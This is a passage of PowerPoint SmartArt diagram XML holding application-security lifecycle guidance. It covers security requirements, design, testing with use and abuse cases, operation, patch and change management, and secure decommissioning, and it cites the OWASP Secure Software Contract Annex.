            <a:rPr lang="en-AU" sz="800" noProof="0" dirty="0"/>
            <a:t>Negotiate with internal or external developers the requirements, including guidelines and security requirements with respect to your security program, e.g. SDLC, best practices.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>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A1479BB3-2B0C-4404-94D6-2197429E5F40}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" noProof="0" dirty="0"/>
            <a:t>To ensure applications have a secure design, the following should be performed:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60603B62-6E95-4C79-956F-0E46FA6C0400}" type="parTrans" cxnId="{3FDE2218-BCF2-4BF4-A33C-B58969BCEBA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4C61C8C1-25B4-4A6F-8ED5-D3C3682DD4A8}" type="sibTrans" cxnId="{3FDE2218-BCF2-4BF4-A33C-B58969BCEBA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0"/>
            <a:t>Operating and Changes</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dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0">
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t>To ensure secure operations and changes, the following should be performed:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>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dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" sz="800" b="0" dirty="0"/>
            <a:t>Compile the technical requirements including functional and non functional security requirements.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{423C079E-E5CB-4C54-9E97-54ADA0F45BF5}" type="parTrans" cxnId="{EC86972E-2736-46DF-8B81-4F5B3C0EE806}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{595F5683-5B41-4144-8717-8475FEB51759}" type="sibTrans" cxnId="{EC86972E-2736-46DF-8B81-4F5B3C0EE806}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" sz="800" b="0" dirty="0"/>
            <a:t>Plan and negotiate the budget that covers all aspects of design, build, testing and operation, including security activities.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{918768C3-D12F-4161-B487-A57F29898241}" type="parTrans" cxnId="{A17BC322-142B-4135-B30F-2C9AFF5A01B4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2411AEFD-A010-4099-9F18-B1617D3A6C02}" type="sibTrans" cxnId="{A17BC322-142B-4135-B30F-2C9AFF5A01B4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" noProof="0" dirty="0"/>
            <a:t>Rate the fulfillment of all technical requirements including a rough planning and design phase.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21595102-299C-4FC9-AD15-9036120CA438}" type="parTrans" cxnId="{007D7FBF-C40D-4DB8-B378-158F813DA4D7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37C87C90-2FAD-4537-98E9-F3A95D63179A}" type="sibTrans" cxnId="{007D7FBF-C40D-4DB8-B378-158F813DA4D7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{38353036-4B60-4F8B-ACD2-5B049C807A9A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" noProof="0" dirty="0"/>
            <a:t>Negotiate all technical requirements including design, security and service level agreements (SLA).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73A5B6BE-984C-43D5-83D1-70267B05EA9B}" type="parTrans" cxnId="{E6EEE8DD-FF26-427B-B1C1-EB643B3126A7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{514DE64B-2054-4928-808C-6A92FFA3AA8E}" type="sibTrans" cxnId="{E6EEE8DD-FF26-427B-B1C1-EB643B3126A7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{495252AF-5996-4B38-A1EE-B648650A10A0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" noProof="0" dirty="0"/>
            <a:t>Adopt templates and checklists, such as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="800" noProof="0" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>OWASP Secure Software Contract Annex</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="800" noProof="0" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5602DF29-E513-4B50-B37A-05F44A5B2860}" type="parTrans" cxnId="{8F6FC27A-30CF-4408-BB5E-6A1DA957A06D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F126DBDA-495B-4894-915F-3153C0E98C12}" type="sibTrans" cxnId="{8F6FC27A-30CF-4408-BB5E-6A1DA957A06D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{89289800-6B11-4BC6-BAD7-66615BE75572}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" sz="800" noProof="0" dirty="0"/>
            <a:t> Negotiate planning and design with the developers and internal shareholders, e.g. security specialists</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3703A8D2-81B2-454D-8F9B-0CA1669135F4}" type="parTrans" cxnId="{3DA7B691-7CEC-44D8-9588-4BDE0F68B5AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21537CC5-9214-4600-AAB5-332EE3A4C820}" type="sibTrans" cxnId="{3DA7B691-7CEC-44D8-9588-4BDE0F68B5AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{657D5226-6628-4A3D-87F9-833B7666A7A2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" sz="800" noProof="0" dirty="0"/>
            <a:t> Define a security architecture, controls, and countermeasures according to the protection needs and the planned environmental security level. This should be supported by security specialists.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6430CCC0-80BE-422D-A3E8-13258D4D7A5E}" type="parTrans" cxnId="{552A0B20-1C40-445C-8690-77A8215027F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{572A770A-F271-4A43-9C1A-29DB0F45AD29}" type="sibTrans" cxnId="{552A0B20-1C40-445C-8690-77A8215027F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB9F0EAE-C91F-4A65-B43A-46392ED38733}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" sz="800" noProof="0" dirty="0"/>
            <a:t> Get the application owner to assume remaining risks or to provide additional resources.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA9F1A23-7ABB-43F5-841D-3D2FC9925CFB}" type="parTrans" cxnId="{763FFEA0-C88A-45E5-8F92-2A5E83D714FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E2D6A2A1-5438-4DC5-806B-70724658813A}" type="sibTrans" cxnId="{763FFEA0-C88A-45E5-8F92-2A5E83D714FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7973B29C-5A9A-4A2C-B276-581656BFB1EE}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" sz="800" noProof="0" dirty="0"/>
            <a:t> Each sprint, ensure security stories are created for functional requirements, and constraints added for non-functional requirements.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" noProof="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5BE4E3D-749F-4DF5-916A-F051FA94842E}" type="parTrans" cxnId="{1CE06618-969C-494C-8F00-59BDC8DEFE9C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{03388AB2-B7BD-4A7D-8228-58066747E14F}" type="sibTrans" cxnId="{1CE06618-969C-494C-8F00-59BDC8DEFE9C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2318C33-0848-4267-9C94-016EE7B20800}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t>Automate the secure setup of the application, interfaces and of all components needed, including required authorizations.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7683A137-9B57-417F-A050-9273448B2B4C}" type="parTrans" cxnId="{7E453174-39BC-451D-B88F-8EE9245B24C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BF13A04-DC8A-4830-AC5F-B50FA511F23C}" type="sibTrans" cxnId="{7E453174-39BC-451D-B88F-8EE9245B24C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44A92D55-6CBA-4BF4-9EEA-1B328C3591FE}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t>Test the technical functions and integration with the IT architecture and coordinate business tests.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CAD62425-A044-493A-9ACD-CCC204D1EF4F}" type="parTrans" cxnId="{ADC13296-B676-4DC9-ADC3-B8509794BF66}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83F80472-48C4-49F9-B224-5AD7D393F679}" type="sibTrans" cxnId="{ADC13296-B676-4DC9-ADC3-B8509794BF66}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t>Create "use" and "abuse" test cases from technical and business perspectives.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97196C37-2225-4EC0-AD9D-ED9EDDE36B2E}" type="parTrans" cxnId="{CDBFCF02-FA6E-4D66-B298-9F146AABA62A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B6FED2A-CCAD-4150-BE86-460500775F70}" type="sibTrans" cxnId="{CDBFCF02-FA6E-4D66-B298-9F146AABA62A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t>Manage security tests according to internal processes, the protection needs and the level of security required by the application.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E0B7461-5330-4740-AF6F-42E7B3BEFEFB}" type="parTrans" cxnId="{4EB4F215-48C5-4B4D-A173-B7696ED64789}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1D675F40-F864-4B2E-B6E2-C9D29AFA9020}" type="sibTrans" cxnId="{4EB4F215-48C5-4B4D-A173-B7696ED64789}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t>Put the application in operation and migrate from previously used applications if needed.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{899E3CF7-9D0C-4165-A610-81A1077E783C}" type="parTrans" cxnId="{1DC5B6B2-769E-49E6-9E6F-5B1BD60A7093}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9AA1C047-7E86-43E3-AA24-C92B3BC7E34B}" type="sibTrans" cxnId="{1DC5B6B2-769E-49E6-9E6F-5B1BD60A7093}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t>Finalize all documentation, including the CMDB and security architecture.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E70C6DAC-1356-44C0-BCA2-24EFFF5743FE}" type="parTrans" cxnId="{05E1F570-6D89-417D-B48C-EF5A7A4B6EEB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{585354FF-8734-42ED-AE1D-8349C73E2B59}" type="sibTrans" cxnId="{05E1F570-6D89-417D-B48C-EF5A7A4B6EEB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C1A3AA0-0A77-4751-A48E-1C557AA7A1B1}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t> Operating including the security management for the application (e.g. patch management).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD0DFC2E-077D-41E3-B0A4-63604CB265D1}" type="parTrans" cxnId="{15767363-C548-4064-B2A3-0DEF6F775C8B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{57282919-BDB2-463E-A675-FC48E99ACDA5}" type="sibTrans" cxnId="{15767363-C548-4064-B2A3-0DEF6F775C8B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t> Raise the security awareness of users and manage conflicts about usability vs security.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36639052-9A6E-47C7-A020-F81AA12F1A3C}" type="parTrans" cxnId="{676748D3-F607-47CC-A287-4A39D51C07C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1887D76E-BF0A-4F02-9071-53896CF7538A}" type="sibTrans" cxnId="{676748D3-F607-47CC-A287-4A39D51C07C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60779E52-CC5F-4109-9E02-C8F73324C37D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t> Plan and manage changes, e.g. migrate to new versions of the application or other components like OS, middleware and libraries.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C494CE06-D836-41D9-ADFD-898F15E5786C}" type="parTrans" cxnId="{BA703DAA-9B41-4D29-9723-261B39AFB443}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A8D486C-9838-4EFE-BEDB-F072BF324AD0}" type="sibTrans" cxnId="{BA703DAA-9B41-4D29-9723-261B39AFB443}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t> Update all documentation, including in CMDB and the security architecture, controls, and countermeasures, including any runbooks or project documentation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F121DD58-051E-4186-B611-30AF12D23895}" type="parTrans" cxnId="{D659A3FD-174A-4538-9937-4FA16D612987}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{816CF6D5-3121-49C6-98A5-77CE40307EFF}" type="sibTrans" cxnId="{D659A3FD-174A-4538-9937-4FA16D612987}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B37AA48A-B472-430E-BA2D-A5987A2A00B1}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t> Any required data is archived. All other data is securely wiped.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{616351A7-0195-4CE7-B5DB-5E2C1EEF2FF1}" type="parTrans" cxnId="{CE7DB697-6F37-4153-8F0D-905D5A8016E8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64A73F2A-13B4-4E68-9636-D09B88E2C56B}" type="sibTrans" cxnId="{CE7DB697-6F37-4153-8F0D-905D5A8016E8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CD4BB62-D241-46BC-9B32-86E2CC12748D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-AU" sz="800" dirty="0"/>
            <a:t> Securely close down the application, including deleting unused accounts and roles and permissions.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2D2A06B-5339-4194-90B5-CCE406438AF1}" type="parTrans" cxnId="{146A4EA3-175B-4E06-AC7B-40AAD1B983FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F48BCD57-6AB8-45C6-AF3F-815020533A4D}" type="sibTrans" cxnId="{146A4EA3-175B-4E06-AC7B-40AAD1B983FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
